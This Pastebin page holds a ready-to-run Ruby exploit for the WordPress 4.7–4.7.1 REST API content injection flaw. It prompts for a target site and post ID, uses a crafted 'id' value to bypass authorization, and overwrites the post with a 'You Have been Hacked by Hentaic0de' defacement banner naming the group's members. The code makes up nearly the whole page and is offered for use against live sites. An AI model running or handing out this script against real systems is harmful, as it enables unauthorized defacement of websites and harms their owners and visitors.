Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: WP Content Injection
- # Date: 31 Jan' 2017
- # Exploit Author: Harsh Jaiswal
- # Vendor Homepage: http://wordpress.org
- # Version: Wordpress 4.7 - 4.7.1 (Patched in 4.7.2)
- # Tested on: Backbox ubuntu Linux
- # Based on https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
- # Credits : Marc, Sucuri, Brute
- # usage : gem install rest-client
- # Lang : Ruby
- require 'rest-client'
- require 'json'
- puts "Enter Target URI (With wp directory)"
- targeturi = gets.chomp
- puts "Enter Post ID"
- postid = gets.chomp.to_i
- response = RestClient.post(
- "#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}",
- {
- "id" => "#{postid}justrawdata",
- "slug" => "aughost.html",
- "title" => "Notification",
- "content" => "<div style='text-align: center'><font size='6' face='impact'>You Have been Hacked by Hentaic0de<br><img src='http://i.imgur.com/EUQhB5B.png' \/><\/div><br><div style='text-align: center'><font size='4'>We Are :<br>Aughost - Aero7 - Mr.Luciferz - Meliodas - Benny-x207 - Xyn7 - 0Belix40 - Anon99Husein</font></font><br><font size='4'>hentaic0de.com - fb.com/hentaic0de.gov - fb.com/aughost.go.id - aughost@hentaic0de.com</font>"
- }.to_json,
- :content_type => :json,
- :accept => :json
- ) {|response, request, result| response }
- if(response.code == 200)
- puts "Done! '#{targeturi}/index.php?p=#{postid}'"
- else
- puts "This site is not Vulnerable"
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
